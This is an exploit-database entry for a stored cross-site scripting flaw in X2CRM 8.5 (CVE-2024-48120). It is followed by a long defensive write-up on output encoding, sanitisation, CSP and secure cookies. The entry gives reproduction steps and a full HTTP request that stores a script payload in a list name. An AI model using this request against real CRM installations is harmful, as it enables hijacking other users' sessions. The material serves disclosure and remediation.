X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

Exploit Author: Okan Kurtulus Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2025-03-27 
# Exploit Title: X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
# Date: 12 September 2024
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://x2engine.com/
# Software Link: https://github.com/X2Engine/X2CRM
# Version: X2CRM v8.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-48120

1-) Log in to the system with any user account. Navigate to the “Opportunities” section from the top menu and select “Create List.” In the “Name” field of the new screen, enter the malicious XSS payload and click “Create.”

2-) Next, return to the “Opportunities” tab and click on “Lists” again. The stored XSS payload will be triggered.

XSS Trigger Request:

POST /x2crm/x2engine/index.php/opportunities/createList HTTP/1.1
Host: 192.168.1.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 390
Origin: http://192.168.1.108
Connection: keep-alive
Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createList
Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D; 5d8630d289284e8c14d15b14f4b4dc28=9d5b82f1240eb47cd73a20df560d9b3086847e33a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%223%22%3Bi%3A1%3Bs%3A4%3A%22test%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; LoginForm[username]=test; LoginForm[rememberMe]=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=Create


X2CRM 8.5 — Stored Cross‑Site Scripting (XSS) (CVE-2024-48120)

Overview

X2CRM 8.5 was reported to contain a stored Cross‑Site Scripting (XSS) vulnerability (CVE-2024-48120). Stored XSS occurs when an application accepts untrusted input, persists it (for example in a database) and later renders it into a page without appropriate output encoding or sanitization. When that rendered content contains executable script, other users who view the page can have arbitrary script executed in their browser context, leading to account compromise, privilege escalation, data theft, or user session abuse.

Technical summary (high level)

  • Vulnerability class: Stored (persistent) Cross‑Site Scripting.
  • Affected component: Web UI that renders user‑supplied text fields (e.g., entity/list metadata or names) without adequate output encoding.
  • Trigger: A malicious string stored in a persistent field is later included in an HTML page and executed in victims' browsers.
  • Attack surface: Any authenticated user able to create or edit persistent items that other users will view.

Impact and risk

  • Session theft and account takeover when session cookies are accessible to JavaScript (no HttpOnly), or when combined with CSRF to perform actions as the victim.
  • Data exfiltration, UI redressing, or forced actions (e.g., sending requests on behalf of the victim).
  • Reputation and compliance impact if customer data is exposed.

Safe detection and triage

Testing should be performed in an isolated lab or staging environment using non‑malicious indicators rather than real exploit payloads. To detect stored XSS risk:

  • Identify inputs that are stored and later rendered (names, descriptions, comments, metadata).
  • Submit benign test markers (plain text tokens) and inspect rendered pages to see whether content is encoded or placed into HTML contexts (text node, attribute, inline script, etc.).
  • Use automated scanners (DAST) to find persistent injection points, then manually review rendering contexts.
  • Review server‑side templates and framework helpers to ensure output encoding is applied on render, not just input validation.

Remediation and secure fixes

Fixes should follow the principle of “encode output, validate input, and apply defense in depth.” Prefer server‑side output encoding over attempts to blacklist all dangerous characters. Below are defensive strategies and example snippets that show secure practices.

1) Output encoding (PHP example)

<?php
// When rendering stored user input into an HTML page:
echo htmlspecialchars($storedName, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
?>

Explanation: htmlspecialchars encodes HTML special characters (<, >, &, quotes) so user data cannot be interpreted as HTML or JavaScript. Use a UTF-8 aware configuration and ENT_QUOTES to encode both single and double quotes. This is the fundamental defense for data placed in HTML text nodes or attributes.

2) Sanitizing allowed HTML (if rich text is required)

<?php
require_once '/path/to/htmlpurifier/library/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.Allowed', 'p,b,strong,i,em,a[href],ul,ol,li'); // allowlist
$purifier = new HTMLPurifier($config);
$clean = $purifier->purify($userProvidedHtml);
echo $clean;
?>

Explanation: If the application must accept limited HTML (rich text), use a well‑maintained allowlist sanitizer such as HTMLPurifier. Configure allowed elements and attributes tightly. Do not rely on simple regex or manual blacklists.

3) Contextual encoding rules

  • HTML body text: use htmlspecialchars equivalent.
  • HTML attributes: encode quotes and special chars; wrap attributes in quotes.
  • JavaScript context: never inject raw user data into inline scripts. If unavoidable, use JSON serialization functions to safely embed data.
  • URL context: validate and encode using rawurlencode or framework URL builders.

4) Content Security Policy (CSP)

// Example HTTP header set in PHP
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-'; object-src 'none'; base-uri 'self';");

Explanation: CSP is a mitigant that restricts where scripts can be loaded from and can block inline script execution unless a nonce or hash is used. CSP does not replace proper encoding, but it raises the cost for exploitation and reduces impact of some XSS classes.

5) Secure session and cookie settings

<?php
// Set session cookie properties (PHP 7.3+ syntax)
session_set_cookie_params([
  'lifetime' => 0,
  'path' => '/',
  'domain' => 'example.com',
  'secure' => true,
  'httponly' => true,
  'samesite' => 'Lax'
]);
session_start();
?>

Explanation: Mark cookies HttpOnly to prevent JavaScript access and set SameSite to limit cross‑site usage. Use Secure when running over HTTPS. These controls reduce the damage an XSS can do to session theft.

6) Fix at the framework/template level

Ensure your templating layer enforces escaping by default. For Yii‑based projects, prefer built‑in encoding helpers (for example, Html::encode or equivalent) and verify that custom helpers or legacy templates haven’t been bypassing encoding.

Testing and verification

  • After applying fixes, retest all formerly vulnerable entry points in a safe environment using non‑destructive markers.
  • Run unit and integration tests to assert that output is encoded in each rendering path.
  • Include regression tests to prevent reintroduction of the vulnerability during future changes.

Operational mitigations

  • Apply vendor security updates and patches as soon as they are available; check X2Engine/X2CRM repositories and vendor advisories for the fixed release addressing CVE-2024-48120.
  • Use a Web Application Firewall (WAF) to provide an additional layer of detection and blocking for common attack patterns, while recognizing this is not a substitute for code fixes.
  • Harden logging and monitoring to detect suspicious activity such as anomalous creation of objects with unusual content.

Incident response guidance

  • If exploitation is suspected, rotate affected users' sessions (invalidate session cookies), force password resets for impacted accounts, and analyze audit logs to identify the scope.
  • Notify stakeholders and affected users where legally required, and retain forensic artifacts for investigation.

Developer checklist

TaskWhy it matters
Escape on outputPrevents rendering of user data as code
Use allowlist sanitizers for HTMLPermits safe rich text without dangerous elements
Set secure cookie flagsReduces session theft risk
Enforce CSPMakes exploitation harder and limits impact
Add regression testsPrevents reintroduction during future changes

References and further reading

  • OWASP XSS Prevention Cheat Sheet — recommended encoding and sanitization practices.
  • HTMLPurifier project — well‑maintained server‑side HTML sanitizer for PHP.
  • Content Security Policy (CSP) documentation — practical mitigations for script injection.

Final notes

Stored XSS is a common and impactful web vulnerability. The correct remediation is to fix the application’s rendering logic (encode and/or sanitize) and apply layered defenses (CSP, secure cookies, WAF). Keep development dependencies and vendor software up to date and include XSS checks in secure‑coding training, code review and CI test suites.